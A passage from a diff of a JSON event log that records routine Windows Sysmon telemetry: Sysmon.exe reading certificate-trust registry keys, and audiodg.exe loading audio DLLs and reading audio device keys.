"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WMALFXGFXDSP.dll", - "image_path": "C:\\Windows\\System32\\WMALFXGFXDSP.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "AudioEng.dll", - "image_path": "C:\\Windows\\System32\\AudioEng.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "AUDIOKSE.dll", - "image_path": "C:\\Windows\\System32\\AUDIOKSE.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 